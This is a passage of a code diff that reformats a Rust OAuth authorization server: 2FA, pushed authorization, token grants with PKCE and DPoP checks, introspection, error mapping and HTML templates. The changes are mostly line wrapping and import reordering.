"invalid_request", 698 744 Some("Authorization request not found. Please start over."), 699 - )).into_response(); 745 + )) 746 + .into_response(); 700 747 } 701 748 Err(_) => { 702 749 return Html(templates::error_page( 703 750 "server_error", 704 751 Some("An error occurred. Please try again."), 705 - )).into_response(); 752 + )) 753 + .into_response(); 706 754 } 707 755 }; 708 756 let channel = query.channel.as_deref().unwrap_or("email"); ··· 710 758 &query.request_uri, 711 759 channel, 712 760 None, 713 - )).into_response() 761 + )) 762 + .into_response() 714 763 } 715 764 716 765 pub async fn authorize_2fa_post( ··· 719 768 Form(form): Form<Authorize2faSubmit>, 720 769 ) -> Response { 721 770 let client_ip = extract_client_ip(&headers); 722 - if !state.check_rate_limit(RateLimitKind::OAuthAuthorize, &client_ip).await { 771 + if !state 772 + .check_rate_limit(RateLimitKind::OAuthAuthorize, &client_ip) 773 + .await 774 + { 723 775 tracing::warn!(ip = %client_ip, "OAuth 2FA rate limit exceeded"); 724 776 return ( 725 777 axum::http::StatusCode::TOO_MANY_REQUESTS, ··· 727 779 "RateLimitExceeded", 728 780 Some("Too many attempts. Please try again later."), 729 781 )), 730 - ).into_response(); 782 + ) 783 + .into_response(); 731 784 } 732 785 let challenge = match db::get_2fa_challenge(&state.db, &form.request_uri).await { 733 786 Ok(Some(c)) => c, ··· 735 788 return Html(templates::error_page( 736 789 "invalid_request", 737 790 Some("No 2FA challenge found. Please start over."), 738 - )).into_response(); 791 + )) 792 + .into_response(); 739 793 } 740 794 Err(_) => { 741 795 return Html(templates::error_page( 742 796 "server_error", 743 797 Some("An error occurred. Please try again."), 744 - )).into_response(); 798 + )) 799 + .into_response(); 745 800 } 746 801 }; 747 802 if challenge.expires_at < Utc::now() { ··· 749 804 return Html(templates::error_page( 750 805 "invalid_request", 751 806 Some("2FA code has expired. Please start over."), 752 - )).into_response(); 807 + )) 808 + .into_response(); 753 809 } 754 810 if challenge.attempts >= MAX_2FA_ATTEMPTS { 755 811 let _ = db::delete_2fa_challenge(&state.db, challenge.id).await; 756 812 return Html(templates::error_page( 757 813 "access_denied", 758 814 Some("Too many failed attempts. Please start over."), 759 - )).into_response(); 815 + )) 816 + .into_response(); 760 817 } 761 - let code_valid: bool = form.code.trim().as_bytes().ct_eq(challenge.code.as_bytes()).into(); 818 + let code_valid: bool = form 819 + .code 820 + .trim() 821 + .as_bytes() 822 + .ct_eq(challenge.code.as_bytes()) 823 + .into(); 762 824 if !code_valid { 763 825 let _ = db::increment_2fa_attempts(&state.db, challenge.id).await; 764 826 let channel = match sqlx::query_scalar!( ··· 771 833 Ok(Some(ch)) => channel_display_name(ch).to_string(), 772 834 Ok(None) | Err(_) => "email".to_string(), 773 835 }; 774 - let _request_data = match db::get_authorization_request(&state.db, &form.request_uri).await { 836 + let _request_data = match db::get_authorization_request(&state.db, &form.request_uri).await 837 + { 775 838 Ok(Some(d)) => d, 776 839 Ok(None) => { 777 840 return Html(templates::error_page( 778 841 "invalid_request", 779 842 Some("Authorization request not found. Please start over."), 780 - )).into_response(); 843 + )) 844 + .into_response(); 781 845 } 782 846 Err(_) => { 783 847 return Html(templates::error_page( 784 848 "server_error", 785 849 Some("An error occurred. Please try again."), 786 - )).into_response(); 850 + )) 851 + .into_response(); 787 852 } 788 853 }; 789 854 return Html(templates::two_factor_page( 790 855 &form.request_uri, 791 856 &channel, 792 857 Some("Invalid verification code. Please try again."), 793 - )).into_response(); 858 + )) 859 + .into_response(); 794 860 } 795 861 let _ = db::delete_2fa_challenge(&state.db, challenge.id).await; 796 862 let request_data = match db::get_authorization_request(&state.db, &form.request_uri).await { ··· 799 865 return Html(templates::error_page( 800 866 "invalid_request", 801 867 Some("Authorization request not found."), 802 - )).into_response(); 868 + )) 869 + .into_response(); 803 870 } 804 871 Err(_) => { 805 872 return Html(templates::error_page( 806 873 "server_error", 807 874 Some("An error occurred."), 808 - )).into_response(); 875 + )) 876 + .into_response(); 809 877 } 810 878 }; 811 879 let code = Code::generate(); 812 880 let device_id = extract_device_cookie(&headers); 813 - if let Err(_) = db::update_authorization_request( 881 + if db::update_authorization_request( 814 882 &state.db, 815 883 &form.request_uri, 816 884 &challenge.did, ··· 818 886 &code.0, 819 887 ) 820 888 .await 889 + .is_err() 821 890 { 822 891 return Html(templates::error_page( 823 892 "server_error", 824 893 Some("An error occurred. Please try again."), 825 - )).into_response(); 894 + )) 895 + .into_response(); 826 896 } 827 897 let redirect_url = build_success_redirect( 828 898 &request_data.parameters.redirect_uri,
+2 -2
src/oauth/endpoints/metadata.rs
··· 1 + use crate::oauth::jwks::{JwkSet, create_jwk_set}; 2 + use crate::state::AppState; 1 3 use axum::{Json, extract::State}; 2 4 use serde::{Deserialize, Serialize}; 3 - use crate::state::AppState; 4 - use crate::oauth::jwks::{JwkSet, create_jwk_set}; 5 5 6 6 #[derive(Debug, Serialize, Deserialize)] 7 7 pub struct ProtectedResourceMetadata {
+2 -2
src/oauth/endpoints/mod.rs
··· 1 + pub mod authorize; 1 2 pub mod metadata; 2 3 pub mod par; 3 - pub mod authorize; 4 4 pub mod token; 5 5 6 + pub use authorize::*; 6 7 pub use metadata::*; 7 8 pub use par::*; 8 - pub use authorize::*; 9 9 pub use token::*;
+12 -12
src/oauth/endpoints/par.rs
··· 1 - use axum::{ 2 - Form, Json, 3 - extract::State, 4 - http::HeaderMap, 1 + use crate::oauth::{ 2 + AuthorizationRequestParameters, ClientAuth, OAuthError, RequestData, RequestId, 3 + client::ClientMetadataCache, db, 5 4 }; 5 + use crate::state::{AppState, RateLimitKind}; 6 + use axum::{Form, Json, extract::State, http::HeaderMap}; 6 7 use chrono::{Duration, Utc}; 7 8 use serde::{Deserialize, Serialize}; 8 - use crate::state::{AppState, RateLimitKind}; 9 - use crate::oauth::{ 10 - AuthorizationRequestParameters, ClientAuth, OAuthError, RequestData, RequestId, 11 - client::ClientMetadataCache, 12 - db, 13 - }; 14 9 15 10 const PAR_EXPIRY_SECONDS: i64 = 600; 16 11 const SUPPORTED_SCOPES: &[&str] = &["atproto", "transition:generic", "transition:chat.bsky"]; ··· 52 47 Form(request): Form<ParRequest>, 53 48 ) -> Result<(axum::http::StatusCode, Json<ParResponse>), OAuthError> { 54 49 let client_ip = crate::rate_limit::extract_client_ip(&headers, None); 55 - if !state.check_rate_limit(RateLimitKind::OAuthPar, &client_ip).await { 50 + if !state 51 + .check_rate_limit(RateLimitKind::OAuthPar, &client_ip) 52 + .await 53 + { 56 54 tracing::warn!(ip = %client_ip, "OAuth PAR rate limit exceeded"); 57 55 return Err(OAuthError::RateLimited); 58 56 } ··· 61 59 "response_type must be 'code'".to_string(), 62 60 )); 63 61 } 64 - let code_challenge = request.code_challenge.as_ref() 62 + let code_challenge = request 63 + .code_challenge 64 + .as_ref() 65 65 .filter(|s| !s.is_empty()) 66 66 .ok_or_else(|| OAuthError::InvalidRequest("code_challenge is required".to_string()))?; 67 67 let code_challenge_method = request.code_challenge_method.as_deref().unwrap_or("");
+32 -32
src/oauth/endpoints/token/grants.rs
··· 1 - use axum::http::HeaderMap; 2 - use axum::Json; 3 - use chrono::{Duration, Utc}; 1 + use super::helpers::{create_access_token, verify_pkce}; 2 + use super::types::{TokenRequest, TokenResponse}; 4 3 use crate::config::AuthConfig; 5 - use crate::state::AppState; 6 4 use crate::oauth::{ 7 5 ClientAuth, OAuthError, RefreshToken, TokenData, TokenId, 8 6 client::{ClientMetadataCache, verify_client_auth}, 9 7 db, 10 8 dpop::DPoPVerifier, 11 9 }; 12 - use super::types::{TokenRequest, TokenResponse}; 13 - use super::helpers::{create_access_token, verify_pkce}; 10 + use crate::state::AppState; 11 + use axum::Json; 12 + use axum::http::HeaderMap; 13 + use chrono::{Duration, Utc}; 14 14 15 15 const ACCESS_TOKEN_EXPIRY_SECONDS: i64 = 3600; 16 16 const REFRESH_TOKEN_EXPIRY_DAYS: i64 = 60; ··· 31 31 .await? 32 32 .ok_or_else(|| OAuthError::InvalidGrant("Invalid or expired code".to_string()))?; 33 33 if auth_request.expires_at < Utc::now() { 34 - return Err(OAuthError::InvalidGrant("Authorization code has expired".to_string())); 34 + return Err(OAuthError::InvalidGrant( 35 + "Authorization code has expired".to_string(), 36 + )); 35 37 } 36 - if let Some(request_client_id) = &request.client_id { 37 - if request_client_id != &auth_request.client_id { 38 + if let Some(request_client_id) = &request.client_id 39 + && request_client_id != &auth_request.client_id { 38 40 return Err(OAuthError::InvalidGrant("client_id mismatch".to_string())); 39 41 } 40 - } 41 42 let did = auth_request 42 43 .did 43 44 .ok_or_else(|| OAuthError::InvalidGrant("Authorization not completed".to_string()))?; 44 45 let client_metadata_cache = ClientMetadataCache::new(3600); 45 46 let client_metadata = client_metadata_cache.get(&auth_request.client_id).await?; 46 - let client_auth = if let (Some(assertion), Some(assertion_type)) = (&request.client_assertion, &request.client_assertion_type) { 47 + let client_auth = if let (Some(assertion), Some(assertion_type)) = 48 + (&request.client_assertion, &request.client_assertion_type) 49 + { 47 50 if assertion_type != "urn:ietf:params:oauth:client-assertion-type:jwt-bearer" { 48 51 return Err(OAuthError::InvalidClient( 49 52 "Unsupported client_assertion_type".to_string(), ··· 61 64 }; 62 65 verify_client_auth(&client_metadata_cache, &client_metadata, &client_auth).await?; 63 66 verify_pkce(&auth_request.parameters.code_challenge, &code_verifier)?; 64 - if let Some(redirect_uri) = &request.redirect_uri { 65 - if redirect_uri != &auth_request.parameters.redirect_uri { 66 - return Err(OAuthError::InvalidGrant("redirect_uri mismatch".to_string())); 67 + if let Some(redirect_uri) = &request.redirect_uri 68 + && redirect_uri != &auth_request.parameters.redirect_uri { 69 + return Err(OAuthError::InvalidGrant( 70 + "redirect_uri mismatch".to_string(), 71 + )); 67 72 } 68 - } 69 73 let dpop_jkt = if let Some(proof) = &dpop_proof { 70 74 let config = AuthConfig::get(); 71 75 let verifier = DPoPVerifier::new(config.dpop_secret().as_bytes()); 72 - let pds_hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 76 + let pds_hostname = 77 + std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 73 78 let token_endpoint = format!("https://{}/oauth/token", pds_hostname); 74 79 let result = verifier.verify_proof(proof, "POST", &token_endpoint, None)?; 75 80 if !db::check_and_record_dpop_jti(&state.db, &result.jti).await? { ··· 77 82 "DPoP proof has already been used".to_string(), 78 83 )); 79 84 } 80 - if let Some(expected_jkt) = &auth_request.parameters.dpop_jkt { 81 - if &result.jkt != expected_jkt { 85 + if let Some(expected_jkt) = &auth_request.parameters.dpop_jkt 86 + && &result.jkt != expected_jkt { 82 87 return Err(OAuthError::InvalidDpopProof( 83 88 "DPoP key binding mismatch".to_string(), 84 89 )); 85 90 } 86 - } 87 91 Some(result.jkt) 88 92 } else if auth_request.parameters.dpop_jkt.is_some() { 89 93 return Err(OAuthError::InvalidRequest( ··· 124 128 let mut response_headers = HeaderMap::new(); 125 129 let config = AuthConfig::get(); 126 130 let verifier = DPoPVerifier::new(config.dpop_secret().as_bytes()); 127 - response_headers.insert( 128 - "DPoP-Nonce", 129 - verifier.generate_nonce().parse().unwrap(), 130 - ); 131 + response_headers.insert("DPoP-Nonce", verifier.generate_nonce().parse().unwrap()); 131 132 Ok(( 132 133 response_headers, 133 134 Json(TokenResponse { ··· 161 162 .ok_or_else(|| OAuthError::InvalidGrant("Invalid refresh token".to_string()))?; 162 163 if token_data.expires_at < Utc::now() { 163 164 db::delete_token_family(&state.db, db_id).await?; 164 - return Err(OAuthError::InvalidGrant("Refresh token has expired".to_string())); 165 + return Err(OAuthError::InvalidGrant( 166 + "Refresh token has expired".to_string(), 167 + )); 165 168 } 166 169 let dpop_jkt = if let Some(proof) = &dpop_proof { 167 170 let config = AuthConfig::get(); 168 171 let verifier = DPoPVerifier::new(config.dpop_secret().as_bytes()); 169 - let pds_hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 172 + let pds_hostname = 173 + std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 170 174 let token_endpoint = format!("https://{}/oauth/token", pds_hostname); 171 175 let result = verifier.verify_proof(proof, "POST", &token_endpoint, None)?; 172 176 if !db::check_and_record_dpop_jti(&state.db, &result.jti).await? { ··· 174 178 "DPoP proof has already been used".to_string(), 175 179 )); 176 180 } 177 - if let Some(expected_jkt) = &token_data.parameters.dpop_jkt { 178 - if &result.jkt != expected_jkt { 181 + if let Some(expected_jkt) = &token_data.parameters.dpop_jkt 182 + && &result.jkt != expected_jkt { 179 183 return Err(OAuthError::InvalidDpopProof( 180 184 "DPoP key binding mismatch".to_string(), 181 185 )); 182 186 } 183 - } 184 187 Some(result.jkt) 185 188 } else if token_data.parameters.dpop_jkt.is_some() { 186 189 return Err(OAuthError::InvalidRequest( ··· 204 207 let mut response_headers = HeaderMap::new(); 205 208 let config = AuthConfig::get(); 206 209 let verifier = DPoPVerifier::new(config.dpop_secret().as_bytes()); 207 - response_headers.insert( 208 - "DPoP-Nonce", 209 - verifier.generate_nonce().parse().unwrap(), 210 - ); 210 + response_headers.insert("DPoP-Nonce", verifier.generate_nonce().parse().unwrap()); 211 211 Ok(( 212 212 response_headers, 213 213 Json(TokenResponse {
+21 -9
src/oauth/endpoints/token/helpers.rs
··· 1 + use crate::config::AuthConfig; 2 + use crate::oauth::OAuthError; 1 3 use base64::Engine; 2 4 use base64::engine::general_purpose::URL_SAFE_NO_PAD; 3 5 use chrono::Utc; 4 6 use hmac::Mac; 5 7 use sha2::{Digest, Sha256}; 6 8 use subtle::ConstantTimeEq; 7 - use crate::config::AuthConfig; 8 - use crate::oauth::OAuthError; 9 9 10 10 const ACCESS_TOKEN_EXPIRY_SECONDS: i64 = 3600; 11 11 ··· 19 19 let mut hasher = Sha256::new(); 20 20 hasher.update(code_verifier.as_bytes()); 21 21 let hash = hasher.finalize(); 22 - let computed_challenge = URL_SAFE_NO_PAD.encode(&hash); 23 - if !bool::from(computed_challenge.as_bytes().ct_eq(code_challenge.as_bytes())) { 24 - return Err(OAuthError::InvalidGrant("PKCE verification failed".to_string())); 22 + let computed_challenge = URL_SAFE_NO_PAD.encode(hash); 23 + if !bool::from( 24 + computed_challenge 25 + .as_bytes() 26 + .ct_eq(code_challenge.as_bytes()), 27 + ) { 28 + return Err(OAuthError::InvalidGrant( 29 + "PKCE verification failed".to_string(), 30 + )); 25 31 } 26 32 Ok(()) 27 33 } ··· 61 67 .map_err(|_| OAuthError::ServerError("HMAC key error".to_string()))?; 62 68 mac.update(signing_input.as_bytes()); 63 69 let signature = mac.finalize().into_bytes(); 64 - let signature_b64 = URL_SAFE_NO_PAD.encode(&signature); 70 + let signature_b64 = URL_SAFE_NO_PAD.encode(signature); 65 71 Ok(format!("{}.{}", signing_input, signature_b64)) 66 72 } 67 73 ··· 76 82 let header: serde_json::Value = serde_json::from_slice(&header_bytes) 77 83 .map_err(|_| OAuthError::InvalidToken("Invalid token header".to_string()))?; 78 84 if header.get("typ").and_then(|t| t.as_str()) != Some("at+jwt") { 79 - return Err(OAuthError::InvalidToken("Not an OAuth access token".to_string())); 85 + return Err(OAuthError::InvalidToken( 86 + "Not an OAuth access token".to_string(), 87 + )); 80 88 } 81 89 if header.get("alg").and_then(|a| a.as_str()) != Some("HS256") { 82 - return Err(OAuthError::InvalidToken("Unsupported algorithm".to_string())); 90 + return Err(OAuthError::InvalidToken( 91 + "Unsupported algorithm".to_string(), 92 + )); 83 93 } 84 94 let config = AuthConfig::get(); 85 95 let secret = config.jwt_secret(); ··· 93 103 mac.update(signing_input.as_bytes()); 94 104 let expected_sig = mac.finalize().into_bytes(); 95 105 if !bool::from(expected_sig.ct_eq(&provided_sig)) { 96 - return Err(OAuthError::InvalidToken("Invalid token signature".to_string())); 106 + return Err(OAuthError::InvalidToken( 107 + "Invalid token signature".to_string(), 108 + )); 97 109 } 98 110 let payload_bytes = URL_SAFE_NO_PAD 99 111 .decode(parts[1])
+12 -6
src/oauth/endpoints/token/introspect.rs
··· 1 - use axum::{Form, Json}; 1 + use super::helpers::extract_token_claims; 2 + use crate::oauth::{OAuthError, db}; 3 + use crate::state::{AppState, RateLimitKind}; 2 4 use axum::extract::State; 3 5 use axum::http::{HeaderMap, StatusCode}; 6 + use axum::{Form, Json}; 4 7 use chrono::Utc; 5 8 use serde::{Deserialize, Serialize}; 6 - use crate::state::{AppState, RateLimitKind}; 7 - use crate::oauth::{OAuthError, db}; 8 - use super::helpers::extract_token_claims; 9 9 10 10 #[derive(Debug, Deserialize)] 11 11 pub struct RevokeRequest { ··· 20 20 Form(request): Form<RevokeRequest>, 21 21 ) -> Result<StatusCode, OAuthError> { 22 22 let client_ip = crate::rate_limit::extract_client_ip(&headers, None); 23 - if !state.check_rate_limit(RateLimitKind::OAuthIntrospect, &client_ip).await { 23 + if !state 24 + .check_rate_limit(RateLimitKind::OAuthIntrospect, &client_ip) 25 + .await 26 + { 24 27 tracing::warn!(ip = %client_ip, "OAuth revoke rate limit exceeded"); 25 28 return Err(OAuthError::RateLimited); 26 29 } ··· 74 77 Form(request): Form<IntrospectRequest>, 75 78 ) -> Result<Json<IntrospectResponse>, OAuthError> { 76 79 let client_ip = crate::rate_limit::extract_client_ip(&headers, None); 77 - if !state.check_rate_limit(RateLimitKind::OAuthIntrospect, &client_ip).await { 80 + if !state 81 + .check_rate_limit(RateLimitKind::OAuthIntrospect, &client_ip) 82 + .await 83 + { 78 84 tracing::warn!(ip = %client_ip, "OAuth introspect rate limit exceeded"); 79 85 return Err(OAuthError::RateLimited); 80 86 }
+14 -20
src/oauth/endpoints/token/mod.rs
··· 3 3 mod introspect; 4 4 mod types; 5 5 6 - use axum::{ 7 - Form, Json, 8 - extract::State, 9 - http::HeaderMap, 10 - }; 6 + use crate::oauth::OAuthError; 11 7 use crate::state::{AppState, RateLimitKind}; 12 - use crate::oauth::OAuthError; 8 + use axum::{Form, Json, extract::State, http::HeaderMap}; 13 9 14 10 pub use grants::{handle_authorization_code_grant, handle_refresh_token_grant}; 15 - pub use helpers::{create_access_token, extract_token_claims, verify_pkce, TokenClaims}; 11 + pub use helpers::{TokenClaims, create_access_token, extract_token_claims, verify_pkce}; 16 12 pub use introspect::{ 17 - introspect_token, revoke_token, IntrospectRequest, IntrospectResponse, RevokeRequest, 13 + IntrospectRequest, IntrospectResponse, RevokeRequest, introspect_token, revoke_token, 18 14 }; 19 15 pub use types::{TokenRequest, TokenResponse}; 20 16 21 17 fn extract_client_ip(headers: &HeaderMap) -> String { 22 - if let Some(forwarded) = headers.get("x-forwarded-for") { 23 - if let Ok(value) = forwarded.to_str() { 24 - if let Some(first_ip) = value.split(',').next() { 18 + if let Some(forwarded) = headers.get("x-forwarded-for") 19 + && let Ok(value) = forwarded.to_str() 20 + && let Some(first_ip) = value.split(',').next() { 25 21 return first_ip.trim().to_string(); 26 22 } 27 - } 28 - } 29 - if let Some(real_ip) = headers.get("x-real-ip") { 30 - if let Ok(value) = real_ip.to_str() { 23 + if let Some(real_ip) = headers.get("x-real-ip") 24 + && let Ok(value) = real_ip.to_str() { 31 25 return value.trim().to_string(); 32 26 } 33 - } 34 27 "unknown".to_string() 35 28 } 36 29 ··· 40 33 Form(request): Form<TokenRequest>, 41 34 ) -> Result<(HeaderMap, Json<TokenResponse>), OAuthError> { 42 35 let client_ip = extract_client_ip(&headers); 43 - if !state.check_rate_limit(RateLimitKind::OAuthToken, &client_ip).await { 36 + if !state 37 + .check_rate_limit(RateLimitKind::OAuthToken, &client_ip) 38 + .await 39 + { 44 40 tracing::warn!(ip = %client_ip, "OAuth token rate limit exceeded"); 45 41 return Err(OAuthError::InvalidRequest( 46 42 "Too many requests. Please try again later.".to_string(), ··· 54 50 "authorization_code" => { 55 51 handle_authorization_code_grant(state, headers, request, dpop_proof).await 56 52 } 57 - "refresh_token" => { 58 - handle_refresh_token_grant(state, headers, request, dpop_proof).await 59 - } 53 + "refresh_token" => handle_refresh_token_grant(state, headers, request, dpop_proof).await, 60 54 _ => Err(OAuthError::UnsupportedGrantType(format!( 61 55 "Unsupported grant_type: {}", 62 56 request.grant_type
+10 -18
src/oauth/error.rs
··· 37 37 OAuthError::InvalidClient(msg) => { 38 38 (StatusCode::UNAUTHORIZED, "invalid_client", Some(msg)) 39 39 } 40 - OAuthError::InvalidGrant(msg) => { 41 - (StatusCode::BAD_REQUEST, "invalid_grant", Some(msg)) 42 - } 40 + OAuthError::InvalidGrant(msg) => (StatusCode::BAD_REQUEST, "invalid_grant", Some(msg)), 43 41 OAuthError::UnauthorizedClient(msg) => { 44 42 (StatusCode::UNAUTHORIZED, "unauthorized_client", Some(msg)) 45 43 } 46 44 OAuthError::UnsupportedGrantType(msg) => { 47 45 (StatusCode::BAD_REQUEST, "unsupported_grant_type", Some(msg)) 48 46 } 49 - OAuthError::InvalidScope(msg) => { 50 - (StatusCode::BAD_REQUEST, "invalid_scope", Some(msg)) 51 - } 52 - OAuthError::AccessDenied(msg) => { 53 - (StatusCode::FORBIDDEN, "access_denied", Some(msg)) 54 - } 47 + OAuthError::InvalidScope(msg) => (StatusCode::BAD_REQUEST, "invalid_scope", Some(msg)), 48 + OAuthError::AccessDenied(msg) => (StatusCode::FORBIDDEN, "access_denied", Some(msg)), 55 49 OAuthError::ServerError(msg) => { 56 50 (StatusCode::INTERNAL_SERVER_ERROR, "server_error", Some(msg)) 57 51 } ··· 69 63 OAuthError::InvalidDpopProof(msg) => { 70 64 (StatusCode::UNAUTHORIZED, "invalid_dpop_proof", Some(msg)) 71 65 } 72 - OAuthError::ExpiredToken(msg) => { 73 - (StatusCode::UNAUTHORIZED, "invalid_token", Some(msg)) 74 - } 75 - OAuthError::InvalidToken(msg) => { 76 - (StatusCode::UNAUTHORIZED, "invalid_token", Some(msg)) 77 - } 78 - OAuthError::RateLimited => { 79 - (StatusCode::TOO_MANY_REQUESTS, "rate_limited", Some("Too many requests. Please try again later.".to_string())) 80 - } 66 + OAuthError::ExpiredToken(msg) => (StatusCode::UNAUTHORIZED, "invalid_token", Some(msg)), 67 + OAuthError::InvalidToken(msg) => (StatusCode::UNAUTHORIZED, "invalid_token", Some(msg)), 68 + OAuthError::RateLimited => ( 69 + StatusCode::TOO_MANY_REQUESTS, 70 + "rate_limited", 71 + Some("Too many requests. Please try again later.".to_string()), 72 + ), 81 73 }; 82 74 ( 83 75 status,
+7 -5
src/oauth/mod.rs
··· 1 - pub mod types; 1 + pub mod client; 2 2 pub mod db; 3 3 pub mod dpop; 4 - pub mod jwks; 5 - pub mod client; 6 4 pub mod endpoints; 7 5 pub mod error; 6 + pub mod jwks; 8 7 pub mod templates; 8 + pub mod types; 9 9 pub mod verify; 10 10 11 - pub use types::*; 12 11 pub use error::OAuthError; 13 - pub use verify::{verify_oauth_access_token, generate_dpop_nonce, VerifyResult, OAuthUser, OAuthAuthError}; 14 12 pub use templates::{DeviceAccount, mask_email}; 13 + pub use types::*; 14 + pub use verify::{ 15 + OAuthAuthError, OAuthUser, VerifyResult, generate_dpop_nonce, verify_oauth_access_token, 16 + };
+21 -10
src/oauth/templates.rs
··· 487 487 ) 488 488 } 489 489 490 - pub fn two_factor_page( 491 - request_uri: &str, 492 - channel: &str, 493 - error_message: Option<&str>, 494 - ) -> String { 490 + pub fn two_factor_page(request_uri: &str, channel: &str, error_message: Option<&str>) -> String { 495 491 let error_html = error_message 496 492 .map(|msg| format!(r#"<div class="error-banner">{}</div>"#, html_escape(msg))) 497 493 .unwrap_or_default(); 498 494 let (title, subtitle) = match channel { 499 - "email" => ("Check your email", "We sent a verification code to your email"), 500 - "Discord" => ("Check Discord", "We sent a verification code to your Discord"), 501 - "Telegram" => ("Check Telegram", "We sent a verification code to your Telegram"), 495 + "email" => ( 496 + "Check your email", 497 + "We sent a verification code to your email", 498 + ), 499 + "Discord" => ( 500 + "Check Discord", 501 + "We sent a verification code to your Discord", 502 + ), 503 + "Telegram" => ( 504 + "Check Telegram", 505 + "We sent a verification code to your Telegram", 506 + ), 502 507 "Signal" => ("Check Signal", "We sent a verification code to your Signal"), 503 508 _ => ("Check your messages", "We sent you a verification code"), 504 509 }; ··· 546 551 } 547 552 548 553 pub fn error_page(error: &str, error_description: Option<&str>) -> String { 549 - let description = error_description.unwrap_or("An error occurred during the authorization process."); 554 + let description = 555 + error_description.unwrap_or("An error occurred during the authorization process."); 550 556 format!( 551 557 r#"<!DOCTYPE html> 552 558 <html lang="en"> ··· 618 624 if clean.is_empty() { 619 625 return "?".to_string(); 620 626 } 621 - clean.chars().next().unwrap_or('?').to_uppercase().to_string() 627 + clean 628 + .chars() 629 + .next() 630 + .unwrap_or('?') 631 + .to_uppercase() 632 + .to_string() 622 633 } 623 634 624 635 pub fn mask_email(email: &str) -> String {
+4 -1
src/oauth/types.rs
··· 22 22 23 23 impl RequestId { 24 24 pub fn generate() -> Self { 25 - Self(format!("urn:ietf:params:oauth:request_uri:{}", uuid::Uuid::new_v4())) 25 + Self(format!( 26 + "urn:ietf:params:oauth:request_uri:{}", 27 + uuid::Uuid::new_v4() 28 + )) 26 29 } 27 30 } 28 31
+43 -26
src/oauth/verify.rs
··· 1 1 use axum::{ 2 + Json, 2 3 extract::FromRequestParts, 3 4 http::{StatusCode, request::Parts}, 4 5 response::{IntoResponse, Response}, 5 - Json, 6 6 }; 7 7 use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD}; 8 8 use hmac::{Hmac, Mac}; ··· 11 11 use sqlx::PgPool; 12 12 use subtle::ConstantTimeEq; 13 13 14 - use crate::config::AuthConfig; 15 - use crate::state::AppState; 14 + use super::OAuthError; 16 15 use super::db; 17 16 use super::dpop::DPoPVerifier; 18 - use super::OAuthError; 17 + use crate::config::AuthConfig; 18 + use crate::state::AppState; 19 19 20 20 pub struct OAuthTokenInfo { 21 21 pub did: String, ··· 48 48 return Err(OAuthError::InvalidToken("Token has expired".to_string())); 49 49 } 50 50 if let Some(expected_jkt) = &token_data.parameters.dpop_jkt { 51 - let proof = dpop_proof.ok_or_else(|| { 52 - OAuthError::UseDpopNonce("DPoP proof required".to_string()) 53 - })?; 51 + let proof = dpop_proof 52 + .ok_or_else(|| OAuthError::UseDpopNonce("DPoP proof required".to_string()))?; 54 53 let config = AuthConfig::get(); 55 54 let verifier = DPoPVerifier::new(config.dpop_secret().as_bytes()); 56 55 let access_token_hash = compute_ath(access_token); 57 - let result = verifier.verify_proof(proof, http_method, http_uri, Some(&access_token_hash))?; 56 + let result = 57 + verifier.verify_proof(proof, http_method, http_uri, Some(&access_token_hash))?; 58 58 if !db::check_and_record_dpop_jti(pool, &result.jti).await? { 59 59 return Err(OAuthError::InvalidDpopProof( 60 60 "DPoP proof has already been used".to_string(), ··· 85 85 let header: serde_json::Value = serde_json::from_slice(&header_bytes) 86 86 .map_err(|_| OAuthError::InvalidToken("Invalid token header".to_string()))?; 87 87 if header.get("typ").and_then(|t| t.as_str()) != Some("at+jwt") { 88 - return Err(OAuthError::InvalidToken("Not an OAuth access token".to_string())); 88 + return Err(OAuthError::InvalidToken( 89 + "Not an OAuth access token".to_string(), 90 + )); 89 91 } 90 92 if header.get("alg").and_then(|a| a.as_str()) != Some("HS256") { 91 - return Err(OAuthError::InvalidToken("Unsupported algorithm".to_string())); 93 + return Err(OAuthError::InvalidToken( 94 + "Unsupported algorithm".to_string(), 95 + )); 92 96 } 93 97 let config = AuthConfig::get(); 94 98 let secret = config.jwt_secret(); ··· 102 106 mac.update(signing_input.as_bytes()); 103 107 let expected_sig = mac.finalize().into_bytes(); 104 108 if !bool::from(expected_sig.ct_eq(&provided_sig)) { 105 - return Err(OAuthError::InvalidToken("Invalid token signature".to_string())); 109 + return Err(OAuthError::InvalidToken( 110 + "Invalid token signature".to_string(), 111 + )); 106 112 } 107 113 let payload_bytes = URL_SAFE_NO_PAD 108 114 .decode(parts[1]) ··· 127 133 .and_then(|s| s.as_str()) 128 134 .ok_or_else(|| OAuthError::InvalidToken("Missing sub claim".to_string()))? 129 135 .to_string(); 130 - let scope = payload.get("scope").and_then(|s| s.as_str()).map(|s| s.to_string()); 136 + let scope = payload 137 + .get("scope") 138 + .and_then(|s| s.as_str()) 139 + .map(|s| s.to_string()); 131 140 let dpop_jkt = payload 132 141 .get("cnf") 133 142 .and_then(|c| c.get("jkt")) ··· 152 161 let mut hasher = Sha256::new(); 153 162 hasher.update(access_token.as_bytes()); 154 163 let hash = hasher.finalize(); 155 - URL_SAFE_NO_PAD.encode(&hash) 164 + URL_SAFE_NO_PAD.encode(hash) 156 165 } 157 166 158 167 pub fn generate_dpop_nonce() -> String { ··· 186 195 ) 187 196 .into_response(); 188 197 if let Some(nonce) = self.dpop_nonce { 189 - response.headers_mut().insert( 190 - "DPoP-Nonce", 191 - nonce.parse().unwrap(), 192 - ); 198 + response 199 + .headers_mut() 200 + .insert("DPoP-Nonce", nonce.parse().unwrap()); 193 201 } 194 202 response 195 203 } ··· 198 206 impl FromRequestParts<AppState> for OAuthUser { 199 207 type Rejection = OAuthAuthError; 200 208 201 - async fn from_request_parts(parts: &mut Parts, state: &AppState) -> Result<Self, Self::Rejection> { 209 + async fn from_request_parts( 210 + parts: &mut Parts, 211 + state: &AppState, 212 + ) -> Result<Self, Self::Rejection> { 202 213 let auth_header = parts 203 214 .headers 204 215 .get("Authorization") ··· 210 221 dpop_nonce: None, 211 222 })?; 212 223 let auth_header_trimmed = auth_header.trim(); 213 - let (token, is_dpop_token) = if auth_header_trimmed.len() >= 7 && auth_header_trimmed[..7].eq_ignore_ascii_case("bearer ") { 224 + let (token, is_dpop_token) = if auth_header_trimmed.len() >= 7 225 + && auth_header_trimmed[..7].eq_ignore_ascii_case("bearer ") 226 + { 214 227 (auth_header_trimmed[7..].trim(), false) 215 - } else if 